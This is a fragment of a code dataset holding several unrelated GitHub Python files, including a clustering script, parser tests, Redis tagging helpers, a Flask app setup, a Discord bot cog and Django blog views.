pca.fit_transform(data)\r\n\r\n#elbow method kmeans\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import silhouette_score\r\n\r\nwcss=[]\r\nfor i in range(1,10):\r\n kmeans = KMeans(n_clusters= i ,init = 'k-means++')\r\n preds = kmeans.fit_predict(x)\r\n center = kmeans.cluster_centers_\r\n #score = silhouette_score(data ,preds )\r\n wcss.append(kmeans.inertia_)\r\n print(i, ' done..' )\r\n \r\nplt.plot(range(1,10) , wcss)\r\nplt.xlabel('no of clusters')\r\nplt.ylabel('distances')\r\nplt.show()\r\n\r\n#Predicting the clusters based on data \r\nclusters = 3\r\nkmeans = KMeans(random_state = 0,n_clusters=clusters ,init = 'k-means++' , max_iter =300 , n_init=10)\r\npred = kmeans.fit_predict(x)\r\n\r\nout = []\r\nfor i in range(3000):\r\n Y = vectorise.transform(text) \r\n pred = kmeans.predict(Y)\r\n out.append(pred)\r\n\r\nuid = ['uid-'+str(i+1) for i in range(3000)]\r\ndf = pd.DataFrame()\r\ndf['id'] = uid\r\ndf['cluster'] = out\r\n\r\ndf.to_csv('output.csv')\r\nnp.savetxt('output.txt', vectorizer.todense())\r\n ","repo_name":"enigmarikki/Clustering-of-financial-articles","sub_path":"Clustering.py","file_name":"Clustering.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39012300567","text":"from src.parser import *\nimport pytest\n\n\ndef test_pass_maintainer():\n expected = { \"Name\": \"Test Name\", \"Email\": \"test.name@test.com\"}\n assert expected == parse_maintainer(\"Test Name \")\n\n@pytest.mark.parametrize(\"package_list\", [\n (\n \"test_package (>= 5.0)\", \n [{\"Name\": \"test_package\", \"Version\": \">= 5.0\"}]\n ),( \n \"libc6 (>= 2.4), libwrap0 (>= 7.6-4~)\",\n [\n {\"Name\": \"libc6\", \"Version\": \">= 2.4\"},\n {\"Name\": \"libwrap0\", \"Version\": \">= 7.6-4~\"}\n ]\n ),(\n \"junit (>= 3.8.2), libplexus-cipher-java\",\n [\n {\"Name\": \"junit\", \"Version\": \">= 3.8.2\"},\n {\"Name\": \"libplexus-cipher-java\"}\n ]\n\n )\n])\n\ndef test_parse_package_list(package_list):\n assert parse_package_list(package_list[0]) == package_list[1]\n\n@pytest.mark.parametrize(\"input\", [\n (\n \"Depends: test_package (>= 5.0)\", \n {\"Depends\": [{\"Name\": \"test_package\", \"Version\": \">= 5.0\"}]}\n ),( \n \"Depends: libc6 (>= 2.4), libwrap0 (>= 7.6-4~)\",\n {\"Depends\":\n [\n {\"Name\": \"libc6\", \"Version\": \">= 2.4\"},\n {\"Name\": \"libwrap0\", \"Version\": \">= 7.6-4~\"}\n ]\n }\n ),(\n \"Depends: junit (>= 3.8.2), libplexus-cipher-java\",\n {\"Depends\":\n [\n {\"Name\": \"junit\", \"Version\": \">= 3.8.2\"},\n {\"Name\": \"libplexus-cipher-java\"}\n ]\n }\n\n )\n])\n\ndef test_key_val_pair(input):\n assert parse_key_val_pair(input[0]) == input[1]","repo_name":"eetu-n/package_visualiser","sub_path":"backend/test/parser_test.py","file_name":"parser_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40900769338","text":"\"\"\" models for app\"\"\"\nfrom repository import JsonRepository\n######Input Divace##########\nclass InputDevice:\n \"\"\"Input device class\"\"\"\n def __init__(self, name, brand):\n self.name = name\n self.brand = brand\n self.repository = JsonRepository()\n\nclass Mouse(InputDevice):\n \"\"\"Mouse class\"\"\"\n def __init__(self, name, brand ):\n super().__init__(name, brand)\n self.id = 0;\n self.units = 0;\n\n def save_mouse(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_mouse(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_mouse(self):\n return self.repository.list()\n \n def delete_mouse(self):\n data = {\n \"id\": self.id,\n }\n self.repository.delete(data)\n \n def search_mouse(self):\n data = {\n \"id\": self.id,\n }\n return self.repository.search(data)\n \n \nclass keyboard(InputDevice):\n \"\"\"Keyboard class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name, brand)\n self.id = 0;\n self.units = 0;\n \n def save_keyboard(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_keyboard(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_keyboard(self):\n return self.repository.list()\n \n def delete_keyboard(self):\n data = {\n \"id\": self.id\n }\n self.repository.delete(data)\n \n def search_keyboard(self, data):\n data = {\n \"id\": self.id\n }\n return self.repository.search(data)\n \n#########Output Divace###### \nclass OutputDevice: \n \"\"\"Output device class\"\"\"\n def __init__(self, name, brand):\n self.name = name\n self.brand = brand\n self.repository = JsonRepository() \n\nclass Monitor(OutputDevice):\n \"\"\"Monitor class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name,brand)\n self.id = 0;\n self.units = 0;\n\n def save_monitor(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_monitor(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_monitor(self):\n return self.repository.list()\n \n def delete_monitor(self):\n data = {\n \"id\": self.id,\n }\n self.repository.delete(data)\n \n def search_monitor(self):\n data = {\n \"id\": self.id,\n }\n return self.repository.search(data)\n \nclass Speaker(OutputDevice):\n \"\"\"Speaker class\"\"\"\n def __init__(self, name, brand):\n super().__init__(name,brand)\n self.id = 0;\n self.units = 0;\n \n def save_speaker(self):\n data ={\n \"name\": self.name,\n \"brand\": self.brand,\n \"id\": self.id,\n \"units\": self.units\n }\n return self.repository.add(data)\n \n def update_speaker(self, new_name=None, new_brand=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand\n }\n if new_name:\n old_data[\"name\"] = self.name\n if new_brand:\n old_data[\"brand\"] = self.brand\n if new_units is not None:\n self.units = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"id\": self.id,\n \"units\": self.units\n }\n self.repository.update(old_data, new_data)\n \n def list_speaker(self):\n return self.repository.list()\n \n def delete_speaker(self):\n data = {\n \"id\" : self.id\n }\n self.repository.delete(data)\n \n def search_speaker(self):\n data = {\n \"id\":self.id,\n }\n return self.repository.search(data) \n\nclass Computer:\n def __int__(self, name, brand, mouse, keyboard, monitor, speaker):\n self.name = name\n self.brand = brand\n self.mouse = mouse\n self.keyboard = keyboard\n self.monitor = monitor\n self.speaker = speaker\n self.id = 0;\n self.units = 0;\n self.repository = JsonRepository()\n \n def save_computer(self):\n data = {\n \"name\": self.name,\n \"brand\": self.brand,\n \"mouse\": {\n \"name\": self.mouse.name,\n \"brand\": self.mouse.brand,\n \"id\": self.mouse.id,\n \"units\": self.mouse.units\n },\n \"keyboard\":{\n \"name\": self.keyboard.name,\n \"brand\": self.keyboard.brand,\n \"id\": self.keyboard.id,\n \"units\": self.keyboard.units\n },\n \"monitor\":{\n \"name\": self.monitor.name,\n \"brand\": self.monitor.brand,\n \"id\": self.monitor.id,\n \"units\": self.monitor.units\n },\n \"speaker\":{\n \"name\": self.speaker.name,\n \"brand\": self.speaker.brand,\n \"id\": self.speaker.id,\n \"units\": self.speaker.units\n },\n \"id\": self.id,\n \"units\": self.units\n \n }\n return self.repository.add(data)\n def update_computer(self, new_name=None, new_brand=None, new_mouse=None, new_keyboard=None, new_monitor=None, new_speaker=None, new_units=None):\n old_data = {\n \"name\": self.name,\n \"brand\": self.brand,\n \"mouse\": {\n \"name\": self.mouse.name,\n \"brand\": self.mouse.brand,\n \"id\": self.mouse.id,\n \"units\": self.mouse.units\n },\n \"keyboard\": {\n \"name\": self.keyboard.name if self.keyboard else None,\n \"brand\": self.keyboard.brand if self.keyboard else None,\n \"id\": self.keyboard.id if self.keyboard else None,\n \"units\": self.keyboard.units if self.keyboard else None\n },\n \"monitor\": {\n \"name\": self.monitor.name if self.monitor else None,\n \"brand\": self.monitor.brand if self.monitor else None,\n \"id\": self.monitor.id if self.monitor else None,\n \"units\": self.monitor.units if self.monitor else None\n },\n \"speaker\": {\n \"name\": self.speaker.name if self.speaker else None,\n \"brand\": self.speaker.brand if self.speaker else None,\n \"id\": self.speaker.id if self.speaker else None,\n \"units\": self.speaker.units if self.speaker else None\n },\n \"units\": self.units\n \n }\n\n if new_name:\n old_data[\"name\"] = new_name\n if new_brand:\n old_data[\"brand\"] = new_brand\n if new_mouse:\n old_data[\"mouse\"] = {\n \"name\": new_mouse.name,\n \"brand\": new_mouse.brand,\n \"id\": new_mouse.id,\n \"units\": new_mouse.units\n }\n if new_keyboard:\n old_data[\"keyboard\"] = {\n \"name\": new_keyboard.name,\n \"brand\": new_keyboard.brand,\n \"id\": new_keyboard.id,\n \"units\": new_keyboard.units\n }\n if new_monitor:\n old_data[\"monitor\"] = {\n \"name\": new_monitor.name,\n \"brand\": new_monitor.brand,\n \"id\": new_monitor.id,\n \"units\": new_monitor.units\n }\n if new_speaker:\n old_data[\"speaker\"] = {\n \"name\": new_speaker.name,\n \"brand\": new_speaker.brand,\n \"id\": new_speaker.id,\n \"units\": new_speaker.units\n }\n if new_units:\n old_data[\"units\"] = new_units\n\n new_data = {\n \"name\": old_data[\"name\"],\n \"brand\": old_data[\"brand\"],\n \"mouse\": old_data[\"mouse\"],\n \"keyboard\": old_data[\"keyboard\"],\n \"monitor\": old_data[\"monitor\"],\n \"speaker\": old_data[\"speaker\"],\n \"units\" : old_data[\"units\"]\n \n }\n self.repository.update(old_data, new_data)\n \n def list_computer(self):\n return self.repository.list()\n \n def delete_computer(self):\n data = {\n \"id\": self.id\n }\n self.repository.delete(data)\n \n def search(self):\n data = {\n \"id\":self.id\n }\n return self.repository.search(data)","repo_name":"InforTech07/intership23.1-practica1","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"3103926346","text":"import tensorflow as tf\n\nfrom stable_baselines.a2c.utils import conv, linear, conv_to_fc\n\n\ndef tic_tac_toe_cnn(scaled_images, **kwargs):\n \"\"\"\n Custom CNN for Tic Tac Toe env.\n\n :param scaled_images: (TensorFlow Tensor) Image input placeholder\n :return: (TensorFlow Tensor) The CNN output layer\n \"\"\"\n activ = tf.nn.relu\n layer = scaled_images\n\n # print(kwargs)\n net_arch = kwargs['cnn_arch']\n filter_size = kwargs['filter_size']\n pad = kwargs['pad']\n\n for i, f in enumerate(net_arch[:-1], start=1):\n # print('c' + str(i), f)\n layer = activ(conv(layer, 'c' + str(i), n_filters=f, filter_size=filter_size,\n stride=1, pad=pad, data_format='NCHW'))\n\n layer = conv_to_fc(layer)\n\n # print('fc1', net_arch[-1])\n # print()\n return activ(linear(layer, 'fc1', n_hidden=net_arch[-1]))\n","repo_name":"mdaraujo/deep-rl-tictactoe","sub_path":"utils/cnn_extractor.py","file_name":"cnn_extractor.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"72417322556","text":"# coding=utf-8\nfrom redis_cache import get_redis_connection\n\n# Для справки, комманды редиса\n# http://redis.io/commands\n\n# лямбда-функция, которая возвращает ключ\n# где хранятся теги для чего-то\n# t - question, например\n# i - идентификатор вопроса\nkey = lambda t, i: u'{0}:{1}:tags'.format(t, i)\n\n# лямбда функция, которая возращает ключ для\n# множества, где хранятся id-шники вопросов\n# у которых есть тег name\ntag_key = lambda t, name: u'tag:{0}:{1}'.format(name, t)\n\n# все теги, их не так много, храним в одном сортированном\n# множестве, где счет у каждого элемента - сколько он раз\n# заюзан в вопросах\nkey_all_tags = 'tags:all'\n\n\ndef get_tags(prefix, tagged_id):\n r = get_redis_connection()\n # smembers возвращает все элементы множества\n # по ключу\n return r.smembers(key(prefix, tagged_id))\n\n\ndef get_top(max_tags=10, offset=0):\n r = get_redis_connection()\n # zrevrage возвращает из упорядоченного множества\n # первые max_tags тегов начиная с offset\n # значения отсортированы (в данном случае по кол-ву вопросов\n # в которых они использованы)\n return r.zrevrange(key_all_tags, offset, max_tags)\n\n\ndef get_models(prefix, tag):\n \"\"\"\n Возвращает id-шники элементов с тегом tag\n Например все вопросы, у которых есть какой-то тег\n \"\"\"\n r = get_redis_connection()\n return r.smembers(tag_key(prefix, tag))\n\n\ndef add_tag(prefix, tagged_id, tag):\n if tag.strip() == '':\n return\n\n r = get_redis_connection()\n # ZINCRBY увеличивает \"счет\" тега, в данном случае на 1\n r.execute_command('ZINCRBY', key_all_tags, 1, tag)\n\n # добавляем тег к вопросу и id-шник вопроса к тегу\n r.sadd(key(prefix, tagged_id), tag)\n r.sadd(tag_key(prefix, tag), tagged_id)\n\n\ndef add_tags(prefix, tagged_id, tags):\n # тут просто добавляем сразу много тегов\n r = get_redis_connection()\n for t in tags:\n if t.strip() == '':\n continue\n r.execute_command('ZINCRBY', key_all_tags, 1, t)\n r.sadd(key(prefix, tagged_id), t)\n r.sadd(tag_key(prefix, t), tagged_id)\n\n\ndef get_tag_count(tag):\n r = get_redis_connection()\n # zscore возвращает счет тега\n return r.zscore(key_all_tags, tag)\n\n\ndef remove_tag(prefix, tagged_id, tag):\n r = get_redis_connection()\n r.execute_command('ZINCRBY', key_all_tags, -1, tag)\n r.srem(key(prefix, tagged_id), tag)\n r.srem(tag_key(prefix, tag), tagged_id)\n\n\ndef get_all_tags():\n r = get_redis_connection()\n return r.zrevrange(key_all_tags, 0, -1)\n\n\ndef get_starts(startswith):\n # а тут для автокомплита\n r = get_redis_connection()\n # zscan ищет по wildcard-у элемент\n\n data = r.execute_command('ZSCAN', key_all_tags, 0, 'match', u'{0}*'.format(startswith))\n result = []\n tags = data[1]\n if len(tags) == 0:\n return None\n count = len(tags)\n for i in range(0, count, 2):\n result.append(tags[i])\n return result\n\n\n","repo_name":"LifeMoroz/faq","sub_path":"tagging/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1848333926","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import path # operating system provides the directory\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\nDB_NAME = \"faceLogin.db\"\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = 'Microsoft engage project'\n app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{DB_NAME}'\n db.init_app(app) # initialise database\n\n from .views import views\n from .auth import auth\n\n app.register_blueprint(views, url_prefix='/')\n app.register_blueprint(auth, url_prefix='/')\n\n from . import models\n from .models import User\n\n create_database(app)\n\n login_manager = LoginManager()\n login_manager.login_view = 'auth.login' # where the user will be redirected if they're not logged in yet\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return User.query.get(int(id)) # filter by, ckecks fro primary key id\n\n return app\n\n\ndef create_database(app):\n if not path.exists('website/' + DB_NAME): # if doesn't already exist, create\n db.create_all(app=app)\n print('Created Database!')\n","repo_name":"Archana00N/Authy-FaceDetection","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10479839145","text":"from reclibwh.utils.ItemMetadata import ExplicitDataFromCSV, ExplicitDataFromPostgres\nimport numpy as np\n\nif __name__==\"__main__\":\n \n data_folder = '/home/ong/personal/recommender/data/ml-20m-2'\n postgres_config='/home/ong/personal/recommender/reclibwh/apps/gcp.postgres.config'\n\n dcsv = ExplicitDataFromCSV(True, data_folder=data_folder)\n dsql = ExplicitDataFromPostgres(\n postgres_config,\n rt='backend_rating', rt_user_col='user_id', rt_item_fk_col='film_id', rt_rating_col='rating',\n it='backend_film', it_item_id_col='dataset_id', it_item_mean_col='mean_rating', ut='auth_user', ut_id_col='id',\n user_offset=0\n ) \n\n md_df = dcsv.fetch_md(list(range(dcsv.M)))\n mean_ratings = dcsv.get_item_mean_ratings(np.arange(dcsv.M))\n md_df = md_df.merge(mean_ratings, left_index=True, right_index=True)\n \n print(len(md_df.index.unique()))\n print(len(md_df))\n\n dsql.add_items(\n **{\n 'item_ids': md_df.index,\n 'names': md_df['title'],\n 'desc': md_df['desc'],\n 'poster_path': md_df['poster_path'],\n 'mean_rating': md_df['rating_item_mean']\n }\n )\n\n print(dsql.get_item_mean_ratings())\n ","repo_name":"whong92/recommender","sub_path":"reclibwh/scripts/csv2postgres.py","file_name":"csv2postgres.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"17879251684","text":"#You are given an array, and a target sum, you need to fund a contiguous array indices, which results to the given sum. This is s greedy approach solution.\r\n#For example, arr = [1, 2, 3, 4, 5, 6, 7], target sum = 9, therefore, the contiguous array resulting in sum 9 will be [2, 3, 4] from indices 1 to 4(4 not included), therefore, the output should be 1, 4.\r\n#Test Cases to be kept in mind:-\r\n#1) Generic array, subarray occurring somewhere in the between.\r\n#2) Subarray could be at the starting of the given array.\r\n#3) Subarray could be at the end of the given array.\r\n#4) There is no subarray resulting in the target sum.\r\n#5) You have a few zeros in the array/list.\r\n#6) There are multiple subarrays resulting in the same target sum.\r\n#7) The array is empty.\r\n#8) The subarray is a single element.\r\n#A bruteforce solution.\r\ndef subarray_sum(arr, sum):\r\n n = len(arr)\r\n #i goes from 0 to n-1, iterating over the full array.\r\n for i in range(0, n):\r\n #J goes from i to N+1, because, in the j index, we also need to return the position of the element which is not included, like as in the rage function, the last index is not included.\r\n for j in range(i, n+1):\r\n if sum(arr[i:j]) == sum:\r\n return i, j\r\n return None, None\r\n#Time Complexity, T(N) = O(n^3)\r\n\r\n#Optimised solutions:-\r\n#1) Maintain a running sum for the inner loop\r\n#2) When sum exceeds the target sum , break the inner loop.\r\n\r\n#1) This solution keeps a track of sum, nand the place where initialised sum becomes equal to the target sum, we simply return the sum.\r\ndef subarray_sum1(arr, sum):\r\n n = len(arr)\r\n for i in range(0, n):\r\n s = 0 #running sum\r\n for j in range(i, n+1):\r\n if s == sum:\r\n return i, j\r\n elif s > sum: \r\n break\r\n if j < n: #This is done beacuse the j loop is taking the n element as well.\r\n s = s + arr[j] #which means the sum is still less than the target sum.\r\n return None, None\r\n#Time Complexity, T(N) = O(n^2)\r\n\r\n#2)\r\ndef subarray_sum(arr, sum):\r\n n = len(arr)\r\n i, j, s = 0, 0, 0\r\n while i < n and i < n+1:\r\n if s == sum:\r\n return i, j\r\n elif s < sum:\r\n s = s + arr[j] #keep incrementing j while keeping i the same.\r\n j = j+1 \r\n elif s > sum:\r\n s = s - arr[i] #The moment where the sum becomes greater then the target sum, then decrease the value of i from the sum, and increment i.\r\n i = i+1\r\n return None, None\r\n#Time Complexity, T(N) = O(N)","repo_name":"radhika-020/DSA","sub_path":"Interview_question.py","file_name":"Interview_question.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5555239961","text":"import discord\r\nfrom discord.ext import commands\r\nimport math\r\n\r\nclass utility(commands.Cog):\r\n def __init__(self, bot, *args, **kwargs):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n @commands.guild_only()\r\n async def invite(self, ctx):\r\n link = \"https://discord.gg/pXWwUhed3h\"\r\n embed = discord.Embed()\r\n embed.description = f\"Your invite is\\n\\n{link}\"\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command(aliases=['latency', 'pong'])\r\n async def ping(self, ctx):\r\n await ctx.send(f\"Pong! My latency is {round(self.bot.latency*1000)} ms\")\r\n\r\n @commands.command(aliases=['userinfo'])\r\n async def whois(self, ctx, member: discord.Member=None):\r\n if not member:\r\n member = ctx.message.author\r\n roles = [role for role in member.roles]\r\n embed = discord.Embed(color=discord.Color.purple(),\r\n timestamp=ctx.message.created_at,\r\n title=f\"User info - {member}\")\r\n \r\n embed.set_thumbnail(url=member.avatar_url)\r\n embed.set_footer(text=f\"Requested by {ctx.author}\")\r\n\r\n embed.add_field(name=\"ID: \", value=member.id, inline=False)\r\n embed.add_field(name=\"Display Name: \", value=member.display_name, inline=False)\r\n\r\n embed.add_field(name=\"Created Account On: \", value=member.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"), inline=False)\r\n embed.add_field(name=\"Joined Server On: \", value=member.joined_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"), inline=False)\r\n\r\n embed.add_field(name=\"Roles: \", value=\"\".join([role.mention for role in roles]), inline=False)\r\n embed.add_field(name=\"Highest Role: \", value=member.top_role.mention, inline=False)\r\n print(member.top_role.mention)\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command(aliases=['si'])\r\n async def serverinfo(self, ctx):\r\n embed = discord.Embed(\r\n color=discord.Color(0xffff),\r\n title=f\"{ctx.guild.name}\"\r\n )\r\n embed.set_thumbnail(url=ctx.guild.icon_url)\r\n embed.add_field(name=\"Region: \", value=f\"`{ctx.guild.region}`\")\r\n embed.add_field(name=\"Member Count: \", value=f\"{ctx.guild.member_count}\")\r\n embed.add_field(name=\"Owner: \", value=f\"{ctx.guild.owner}\")\r\n embed.add_field(name=\"Verification Level: \", value=f\"{ctx.guild.verification_level}\")\r\n embed.add_field(name=\"Content Filter: \", value=f\"{ctx.guild.explicit_content_filter}\")\r\n embed.add_field(name=\"Number of Boosts: \", value=f\"{ctx.guild.premium_subscription_count}\")\r\n embed.add_field(name=\"Premium Tier: \", value=f\"{ctx.guild.premium_tier}\")\r\n embed.set_footer(icon_url=f\"{ctx.guild.icon_url}\", text=f\"Guild ID: {ctx.guild.id}\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command()\r\n async def report(self, ctx, member: discord.Member, *, reason):\r\n rchannel = ctx.get_channel(738667684899717220)\r\n\r\n embed = discord.Embed(title=f\"New report\")\r\n embed.add_field(name=\"Reporter: \", value=f\"{ctx.author.mention}\")\r\n embed.add_field(name=\"Reportee: \", value=f\"{member.mention}\")\r\n embed.add_field(name=\"Reason: \", value=f\"{reason}\")\r\n await rchannel.send(embed=embed)\r\n\r\ndef setup(bot):\r\n bot.add_cog(utility(bot))\r\n print(\"Utility cog loaded\\n----------\\n\")","repo_name":"Sable-20/BLP","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2913498600","text":"import os \nfrom Models import Directory,File\nfrom Controllers import directoryController,fileController,dbController\nfrom flask import Flask \nfrom flask_session import Session\nfrom Authentication.authentication import authentication\nclass Configuration():\n def __init__(self):\n self.currentDir=Directory.Directory(\"FILEMAN\",os.path.expanduser('~'))\n self.currentDirCon=directoryController.directoryController(self.currentDir)\n self.currentDirCon.addDir(self.currentDir.getName())\n self.fileCon=fileController.fileController(File.File('',self.currentDirCon.getCurrentDir()))\n self.app = Flask(__name__)\n self.app.secret_key='filemanRules*!&@'\n self.app.config['UPLOAD_FOLDER'] = os.path.join(\"FILEMAN\",os.path.expanduser('~'))\n self.app.config['SESSION_PERMANENT']= False\n self.app.config['SESSION_TYPE']= 'filesystem'\n Session(self.app)\n self.dbCon = dbController.dbController('user.db')\n self.table = \"\"\" CREATE TABLE users(\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n root TEXT NOT NULL\n );\"\"\"\n self.auth=authentication(self.dbCon)\n\n def getControllers(self):\n \"\"\"returns controllers required by flask app\"\"\"\n return self.currentDirCon,self.fileCon, self.dbCon\n\n def getUsrControllers(self):\n '''returns user directory controller'''\n con=directoryController.directoryController(Directory.Directory(\"FILEMAN\",os.path.expanduser('~')))\n print('con::::'+con.getCurrentDir())\n return con \n\n \n \n def getAuth(self):\n return self.auth\n\n def getApp(self):\n \"\"\"returns app object\"\"\"\n return self.app\n\n def getTable(self):\n \"\"\"returns table string with columns to be created\"\"\"\n return self.table\n ","repo_name":"Tamsanqa743/FileMan","sub_path":"App/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14593007808","text":"import librosa\nfrom scipy import spatial\nfrom scipy.signal import resample\nimport numpy as np\nimport cv2\n\ndef cosine_similarity(x, y):\n return 1 - spatial.distance.cosine(x, y)\n\ndef next_pow_2(x):\n \"\"\"Smallest next power of two of a given value x.\"\"\"\n return 1 << (x - 1).bit_length()\n\n\ndef mfccs(path):\n audio_signal, sample_rate = librosa.core.load(path)\n first_five_minutes = sample_rate * 60 * 5\n\n audio_signal_first_five_minutes = audio_signal[:first_five_minutes]\n number_of_audio_samples = len(audio_signal_first_five_minutes)\n audio_duration = float(\n number_of_audio_samples / float(sample_rate))\n\n audio_frame_size = next_pow_2(int(sample_rate / 4.0)) # i.e., about 0.25 seconds.\n audio_hop_size = int(audio_frame_size / 2.0) # i.e., 50% overlap.\n\n mfccs_matrix = librosa.feature.mfcc(\n audio_signal_first_five_minutes, n_fft=audio_frame_size, hop_length=audio_hop_size)\n\n\n number_of_seconds = int(np.round(audio_duration))\n return np.array(resample(mfccs_matrix.transpose(), number_of_seconds))\n\nep1 = mfccs(\"videos/House.Of.Cards.S01E03.720p.BluRay.x265.mp4\")\nep2 = mfccs(\"videos/House.Of.Cards.S01E04.720p.BluRay.x265.mp4\")\n\nscaledep1 = cv2.resize(ep1, (7200, 7200), interpolation=cv2.INTER_CUBIC)\nscaledep2 = cv2.resize(ep2, (7200, 7200), interpolation=cv2.INTER_CUBIC)\n\n\nnp.save(\"np/House.Of.Cards.S01E03.720p.BluRay.x265.npy\", scaledep1)\nnp.save(\"np/House.Of.Cards.S01E04.720p.BluRay.x265.npy\", scaledep2)\n","repo_name":"GijsWeterings/Notflix","sub_path":"extractaudio.py","file_name":"extractaudio.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22272468170","text":"import json\r\nfrom numpy import source\r\nimport pandas as pd\r\n\r\n\r\ndf=pd.read_csv('mvf_user.csv')\r\n\r\nmvf_user=df.groupby(['user_id','email_id']).apply(lambda x:x.to_json(orient='records')).reset_index().rename(columns={0:'status'})\r\nmvf_json = json.loads(mvf_user.to_json(orient ='records'))\r\n\r\n\r\nwith open(\"mvf_user.json\" , \"w\") as f:\r\n count=0\r\n f.write(\"{\")\r\n f.write('\"data\":[')\r\n #f.write(\"{\")\r\n for obj in mvf_json:\r\n obj[\"status\"] = json.loads(obj[\"status\"])\r\n json.dump(obj, f, indent=4)\r\n count=count+1\r\n print(count)\r\n if count<=42:\r\n f.write(\",\")\r\n\r\n \r\n f.write(\"]\")\r\n f.write(\"}\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"Chetana-Rera/Assignment_1","sub_path":"test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23948921904","text":"\n\nfrom django.views import generic\nfrom . import models\n\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\n\nclass BlogIndex(generic.ListView):\n queryset = models.Entry.objects.published()\n template_name = 'home.html'\n paginate_by = 2\n\n\n def get_context_data(self, **kwargs):\n context = super(BlogIndex, self).get_context_data(**kwargs)\n blog_entries = models.Entry.objects.all()\n paginator = Paginator(blog_entries, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n try:\n entry_page = paginator.page(page)\n except PageNotAnInteger:\n entry_page = paginator.page(1)\n except EmptyPage:\n entry_page = paginator.page(paginator.num_pages)\n\n context['object_list'] = entry_page\n context['recent_entries'] = blog_entries\n return context\n\nclass BlogDetail(generic.DetailView):\n model = models.Entry\n template_name = 'post.html'\n\n def get_context_data(self, **kwargs):\n context = super(BlogDetail, self).get_context_data(**kwargs)\n blog_entries = models.Entry.objects.all()\n \n context['recent_entries'] = blog_entries\n return 